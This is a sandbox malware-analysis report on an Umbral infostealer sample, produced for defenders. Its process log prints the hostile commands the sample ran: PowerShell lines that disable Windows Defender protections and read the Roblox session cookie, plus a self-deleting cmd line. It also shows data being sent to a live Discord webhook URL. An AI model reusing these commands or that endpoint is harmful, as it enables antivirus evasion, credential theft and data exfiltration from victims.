Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    93s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/04/2024, 16:52 UTC

General

  • Target

    ClientBetaNew.exe

  • Size

    229KB

  • MD5

    e7fca17393a9f4cb9ccb2f65fc2bb214

  • SHA1

    cef26fa30e3f68d85ab923beecc0cd0dbfa2a720

  • SHA256

    499282fecf90d5dcdf2b01ca4413c37477ec17b6068b43300dfeaefa1fb50978

  • SHA512

    303fe673e0d12410010971fb15ae58751948a7e0fb559e97acf5c73df0a7987dc8d423d59ebdfdfee79ef2696795ecf78543dcb74bebf6073a65229a2d24b80a

  • SSDEEP

    6144:9loZM+rIkd8g+EtXHkv/iD4rzQumkrHM99YW3X2gyb8e1mtzi:foZtL+EP8rzQumkrHM99YW3X23Ie

Score
10/10

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ClientBetaNew.exe
    "C:\Users\Admin\AppData\Local\Temp\ClientBetaNew.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:876
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2060
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\ClientBetaNew.exe"
      2⤵
      • Views/modifies file attributes
      PID:64
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ClientBetaNew.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2576
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2932
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4728
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3908
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1472
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:3608
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:2056
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1664
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:4896
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\ClientBetaNew.exe" && pause
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:5000
          • C:\Windows\system32\PING.EXE
            ping localhost
            3⤵
            • Runs ping.exe
            PID:3432

      Network

      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dnsgoogle
      • flag-us
        DNS
        gstatic.com
        ClientBetaNew.exe
        Remote address:
        8.8.8.8:53
        Request
        gstatic.com
        IN A
        Response
        gstatic.com
        IN A
        142.250.200.35
      • flag-gb
        GET
        https://gstatic.com/generate_204
        ClientBetaNew.exe
        Remote address:
        142.250.200.35:443
        Request
        GET /generate_204 HTTP/1.1
        Host: gstatic.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 204 No Content
        Content-Length: 0
        Cross-Origin-Resource-Policy: cross-origin
        Date: Mon, 15 Apr 2024 16:52:13 GMT
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      • flag-us
        DNS
        ip-api.com
        ClientBetaNew.exe
        Remote address:
        8.8.8.8:53
        Request
        ip-api.com
        IN A
        Response
        ip-api.com
        IN A
        208.95.112.1
      • flag-us
        GET
        http://ip-api.com/line/?fields=hosting
        ClientBetaNew.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /line/?fields=hosting HTTP/1.1
        Host: ip-api.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Mon, 15 Apr 2024 16:52:12 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 6
        Access-Control-Allow-Origin: *
        X-Ttl: 60
        X-Rl: 44
      • flag-us
        DNS
        0.204.248.87.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        0.204.248.87.in-addr.arpa
        IN PTR
        Response
        0.204.248.87.in-addr.arpa
        IN PTR
        https-87-248-204-0lhrllnwnet
      • flag-us
        DNS
        35.200.250.142.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        35.200.250.142.in-addr.arpa
        IN PTR
        Response
        35.200.250.142.in-addr.arpa
        IN PTR
        lhr48s30-in-f31e100net
      • flag-us
        DNS
        241.154.82.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        241.154.82.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        1.112.95.208.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        1.112.95.208.in-addr.arpa
        IN PTR
        Response
        1.112.95.208.in-addr.arpa
        IN PTR
        ip-apicom
      • flag-us
        DNS
        g.bing.com
        Remote address:
        8.8.8.8:53
        Request
        g.bing.com
        IN A
        Response
        g.bing.com
        IN CNAME
        g-bing-com.dual-a-0034.a-msedge.net
        g-bing-com.dual-a-0034.a-msedge.net
        IN CNAME
        dual-a-0034.a-msedge.net
        dual-a-0034.a-msedge.net
        IN A
        204.79.197.237
        dual-a-0034.a-msedge.net
        IN A
        13.107.21.237
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid=
        Remote address:
        204.79.197.237:443
        Request
        GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        set-cookie: MUID=35D3A3B46C8D6F6C3706B7D66DAA6EC5; domain=.bing.com; expires=Sat, 10-May-2025 16:52:14 GMT; path=/; SameSite=None; Secure; Priority=High;
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 0A4D6107393C435B8E9CE21FFD07FB52 Ref B: LON04EDGE0710 Ref C: 2024-04-15T16:52:14Z
        date: Mon, 15 Apr 2024 16:52:14 GMT
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid=
        Remote address:
        204.79.197.237:443
        Request
        GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        cookie: MUID=35D3A3B46C8D6F6C3706B7D66DAA6EC5
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        set-cookie: MSPTC=91_4y10nvwmWCifV8o7e8W5zhbPMYNPzdfwc-_RNULM; domain=.bing.com; expires=Sat, 10-May-2025 16:52:15 GMT; path=/; Partitioned; secure; SameSite=None
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 1890690C319947EEBD9B99ACFDFB2996 Ref B: LON04EDGE0710 Ref C: 2024-04-15T16:52:15Z
        date: Mon, 15 Apr 2024 16:52:14 GMT
      • flag-us
        GET
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid=
        Remote address:
        204.79.197.237:443
        Request
        GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        cookie: MUID=35D3A3B46C8D6F6C3706B7D66DAA6EC5; MSPTC=91_4y10nvwmWCifV8o7e8W5zhbPMYNPzdfwc-_RNULM
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: B772E3DA9BD046B9B527AFDC4A44C603 Ref B: LON04EDGE0710 Ref C: 2024-04-15T16:52:15Z
        date: Mon, 15 Apr 2024 16:52:15 GMT
      • flag-us
        DNS
        237.197.79.204.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        237.197.79.204.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        21.114.53.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        21.114.53.23.in-addr.arpa
        IN PTR
        Response
        21.114.53.23.in-addr.arpa
        IN PTR
        a23-53-114-21deploystaticakamaitechnologiescom
      • flag-us
        DNS
        26.35.223.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        26.35.223.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        GET
        http://ip-api.com/json/?fields=225545
        ClientBetaNew.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /json/?fields=225545 HTTP/1.1
        Host: ip-api.com
        Response
        HTTP/1.1 200 OK
        Date: Mon, 15 Apr 2024 16:52:17 GMT
        Content-Type: application/json; charset=utf-8
        Content-Length: 164
        Access-Control-Allow-Origin: *
        X-Ttl: 54
        X-Rl: 41
      • flag-nl
        GET
        https://www.bing.com/th?id=OADD2.10239368184744_14DPBWVU0KKOKDZ8E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90
        Remote address:
        23.62.61.97:443
        Request
        GET /th?id=OADD2.10239368184744_14DPBWVU0KKOKDZ8E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90 HTTP/2.0
        host: www.bing.com
        accept: */*
        cookie: MUID=35D3A3B46C8D6F6C3706B7D66DAA6EC5; MSPTC=91_4y10nvwmWCifV8o7e8W5zhbPMYNPzdfwc-_RNULM
        accept-encoding: gzip, deflate, br
        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
        Response
        HTTP/2.0 200
        cache-control: public, max-age=2592000
        content-type: image/png
        access-control-allow-origin: *
        access-control-allow-headers: *
        access-control-allow-methods: GET, POST, OPTIONS
        timing-allow-origin: *
        report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
        nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
        content-length: 5773
        date: Mon, 15 Apr 2024 16:52:19 GMT
        alt-svc: h3=":443"; ma=93600
        x-cdn-traceid: 0.5d3d3e17.1713199939.17b7183c
      • flag-us
        DNS
        97.61.62.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        97.61.62.23.in-addr.arpa
        IN PTR
        Response
        97.61.62.23.in-addr.arpa
        IN PTR
        a23-62-61-97deploystaticakamaitechnologiescom
      • flag-us
        DNS
        discord.com
        ClientBetaNew.exe
        Remote address:
        8.8.8.8:53
        Request
        discord.com
        IN A
        Response
        discord.com
        IN A
        162.159.135.232
        discord.com
        IN A
        162.159.128.233
        discord.com
        IN A
        162.159.138.232
        discord.com
        IN A
        162.159.136.232
        discord.com
        IN A
        162.159.137.232
      • flag-us
        POST
        https://discord.com/api/webhooks/1228961158032261151/x5bALpkiKWNhez1S3tpx6EU3KWmw4QhC3ZYLfNmj5sJalr62XbwIXFICAAfVJYroxbhu
        ClientBetaNew.exe
        Remote address:
        162.159.135.232:443
        Request
        POST /api/webhooks/1228961158032261151/x5bALpkiKWNhez1S3tpx6EU3KWmw4QhC3ZYLfNmj5sJalr62XbwIXFICAAfVJYroxbhu HTTP/1.1
        Accept: application/json
        User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
        Content-Type: application/json; charset=utf-8
        Host: discord.com
        Content-Length: 926
        Expect: 100-continue
        Connection: Keep-Alive
        Response
        HTTP/1.1 404 Not Found
        Date: Mon, 15 Apr 2024 16:52:20 GMT
        Content-Type: application/json
        Content-Length: 45
        Connection: keep-alive
        set-cookie: __dcfduid=8666cb4afb4811eebc9f6aa757e85bfb; Expires=Sat, 14-Apr-2029 16:52:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1713199942
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q%2BpP7FwKwWjiMOj2%2FLqMlBxrz4ohsRUThWuF%2BKquFLG%2BF6cXD4267IhIzBaGuP1yAuw%2BKe5zMmDTp1U4gT3b04ZApB5eV1edbq3n56meVxeUUIPGStTYmQvUPxJP"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=8666cb4afb4811eebc9f6aa757e85bfbc788ee2d9c057dfa0882cc2a4c72ca417fbbea1a8c1103a0b8c517166e69987c; Expires=Sat, 14-Apr-2029 16:52:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=282972795a385495bbf48d4a4007f0e14029134c-1713199940; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=EdW5NjypE_VP_3f85ToOmasWLRz7uFL2F1krYhTJ1DU-1713199940661-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 874d720bfb5563e4-LHR
      • flag-us
        POST
        https://discord.com/api/webhooks/1228961158032261151/x5bALpkiKWNhez1S3tpx6EU3KWmw4QhC3ZYLfNmj5sJalr62XbwIXFICAAfVJYroxbhu
        ClientBetaNew.exe
        Remote address:
        162.159.135.232:443
        Request
        POST /api/webhooks/1228961158032261151/x5bALpkiKWNhez1S3tpx6EU3KWmw4QhC3ZYLfNmj5sJalr62XbwIXFICAAfVJYroxbhu HTTP/1.1
        Accept: application/json
        User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
        Content-Type: multipart/form-data; boundary="2cdcdd5f-0d33-48ff-89e8-777ff963078a"
        Host: discord.com
        Cookie: __dcfduid=8666cb4afb4811eebc9f6aa757e85bfb; __sdcfduid=8666cb4afb4811eebc9f6aa757e85bfbc788ee2d9c057dfa0882cc2a4c72ca417fbbea1a8c1103a0b8c517166e69987c; __cfruid=282972795a385495bbf48d4a4007f0e14029134c-1713199940; _cfuvid=EdW5NjypE_VP_3f85ToOmasWLRz7uFL2F1krYhTJ1DU-1713199940661-0.0.1.1-604800000
        Content-Length: 431741
        Expect: 100-continue
        Response
        HTTP/1.1 404 Not Found
        Date: Mon, 15 Apr 2024 16:52:21 GMT
        Content-Type: application/json
        Content-Length: 45
        Connection: keep-alive
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1713199942
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3SshqaWBvY4qbIB4ovh0E1sJsGSJGyCG0P9HUalCKuGpRlcvA6qjGrO2WSbrQPsjbb%2FlmEHINXeC9CVJc5e8QEy95c3u4T5wF%2FBpnMwi4%2F%2BUjuSiZXG5IRxlIHgW"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Server: cloudflare
        CF-RAY: 874d720d6d5663e4-LHR
      • flag-us
        DNS
        232.135.159.162.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        232.135.159.162.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        50.23.12.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        50.23.12.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        18.31.95.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        18.31.95.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        240.221.184.93.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        240.221.184.93.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        0.205.248.87.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        0.205.248.87.in-addr.arpa
        IN PTR
        Response
        0.205.248.87.in-addr.arpa
        IN PTR
        https-87-248-205-0lgwllnwnet
      • flag-us
        DNS
        91.90.14.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        91.90.14.23.in-addr.arpa
        IN PTR
        Response
        91.90.14.23.in-addr.arpa
        IN PTR
        a23-14-90-91deploystaticakamaitechnologiescom
      • flag-us
        DNS
        48.229.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        48.229.111.52.in-addr.arpa
        IN PTR
        Response
      • 142.250.200.35:443
        https://gstatic.com/generate_204
        tls, http
        ClientBetaNew.exe
        770 B
        5.1kB
        9
        9

        HTTP Request

        GET https://gstatic.com/generate_204

        HTTP Response

        204
      • 208.95.112.1:80
        http://ip-api.com/line/?fields=hosting
        http
        ClientBetaNew.exe
        310 B
        267 B
        5
        2

        HTTP Request

        GET http://ip-api.com/line/?fields=hosting

        HTTP Response

        200
      • 204.79.197.237:443
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid=
        tls, http2
        2.0kB
        9.3kB
        22
        20

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid=

        HTTP Response

        204

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid=

        HTTP Response

        204

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid=

        HTTP Response

        204
      • 208.95.112.1:80
        http://ip-api.com/json/?fields=225545
        http
        ClientBetaNew.exe
        285 B
        513 B
        5
        4

        HTTP Request

        GET http://ip-api.com/json/?fields=225545

        HTTP Response

        200
      • 23.62.61.97:443
        https://www.bing.com/th?id=OADD2.10239368184744_14DPBWVU0KKOKDZ8E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90
        tls, http2
        1.7kB
        11.1kB
        20
        15

        HTTP Request

        GET https://www.bing.com/th?id=OADD2.10239368184744_14DPBWVU0KKOKDZ8E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90

        HTTP Response

        200
      • 162.159.135.232:443
        https://discord.com/api/webhooks/1228961158032261151/x5bALpkiKWNhez1S3tpx6EU3KWmw4QhC3ZYLfNmj5sJalr62XbwIXFICAAfVJYroxbhu
        tls, http
        ClientBetaNew.exe
        521.0kB
        11.6kB
        387
        139

        HTTP Request

        POST https://discord.com/api/webhooks/1228961158032261151/x5bALpkiKWNhez1S3tpx6EU3KWmw4QhC3ZYLfNmj5sJalr62XbwIXFICAAfVJYroxbhu

        HTTP Response

        404

        HTTP Request

        POST https://discord.com/api/webhooks/1228961158032261151/x5bALpkiKWNhez1S3tpx6EU3KWmw4QhC3ZYLfNmj5sJalr62XbwIXFICAAfVJYroxbhu

        HTTP Response

        404
      • 8.8.8.8:53
        8.8.8.8.in-addr.arpa
        dns
        66 B
        90 B
        1
        1

        DNS Request

        8.8.8.8.in-addr.arpa

      • 8.8.8.8:53
        gstatic.com
        dns
        ClientBetaNew.exe
        57 B
        73 B
        1
        1

        DNS Request

        gstatic.com

        DNS Response

        142.250.200.35

      • 8.8.8.8:53
        ip-api.com
        dns
        ClientBetaNew.exe
        56 B
        72 B
        1
        1

        DNS Request

        ip-api.com

        DNS Response

        208.95.112.1

      • 8.8.8.8:53
        0.204.248.87.in-addr.arpa
        dns
        71 B
        116 B
        1
        1

        DNS Request

        0.204.248.87.in-addr.arpa

      • 8.8.8.8:53
        35.200.250.142.in-addr.arpa
        dns
        73 B
        111 B
        1
        1

        DNS Request

        35.200.250.142.in-addr.arpa

      • 8.8.8.8:53
        241.154.82.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        241.154.82.20.in-addr.arpa

      • 8.8.8.8:53
        1.112.95.208.in-addr.arpa
        dns
        71 B
        95 B
        1
        1

        DNS Request

        1.112.95.208.in-addr.arpa

      • 8.8.8.8:53
        g.bing.com
        dns
        56 B
        151 B
        1
        1

        DNS Request

        g.bing.com

        DNS Response

        204.79.197.237
        13.107.21.237

      • 8.8.8.8:53
        237.197.79.204.in-addr.arpa
        dns
        73 B
        143 B
        1
        1

        DNS Request

        237.197.79.204.in-addr.arpa

      • 8.8.8.8:53
        21.114.53.23.in-addr.arpa
        dns
        71 B
        135 B
        1
        1

        DNS Request

        21.114.53.23.in-addr.arpa

      • 8.8.8.8:53
        26.35.223.20.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        26.35.223.20.in-addr.arpa

      • 8.8.8.8:53
        97.61.62.23.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        97.61.62.23.in-addr.arpa

      • 8.8.8.8:53
        discord.com
        dns
        ClientBetaNew.exe
        57 B
        137 B
        1
        1

        DNS Request

        discord.com

        DNS Response

        162.159.135.232
        162.159.128.233
        162.159.138.232
        162.159.136.232
        162.159.137.232

      • 8.8.8.8:53
        232.135.159.162.in-addr.arpa
        dns
        74 B
        136 B
        1
        1

        DNS Request

        232.135.159.162.in-addr.arpa

      • 8.8.8.8:53
        50.23.12.20.in-addr.arpa
        dns
        70 B
        156 B
        1
        1

        DNS Request

        50.23.12.20.in-addr.arpa

      • 8.8.8.8:53
        18.31.95.13.in-addr.arpa
        dns
        70 B
        144 B
        1
        1

        DNS Request

        18.31.95.13.in-addr.arpa

      • 8.8.8.8:53
        240.221.184.93.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        240.221.184.93.in-addr.arpa

      • 8.8.8.8:53
        0.205.248.87.in-addr.arpa
        dns
        71 B
        116 B
        1
        1

        DNS Request

        0.205.248.87.in-addr.arpa

      • 8.8.8.8:53
        91.90.14.23.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        91.90.14.23.in-addr.arpa

      • 8.8.8.8:53
        48.229.111.52.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        48.229.111.52.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        2b177ee51274376214d9f897a4cb90d2

        SHA1

        6cd0e8f9d48257d5824b700d1d02f6fde583b41f

        SHA256

        55e37da08076fdb55cfcb3ba36bf305ab5a306734d6294280daa4c92481a5339

        SHA512

        5d40f255cea9bdcf2b9576f393ea9246cfba9b910b5960e74c4bf1fe1d2dd53108341d20baf8f963e839694a112a51df4a720c52039699c2c99b4f7cb915624e

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        77d622bb1a5b250869a3238b9bc1402b

        SHA1

        d47f4003c2554b9dfc4c16f22460b331886b191b

        SHA256

        f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

        SHA512

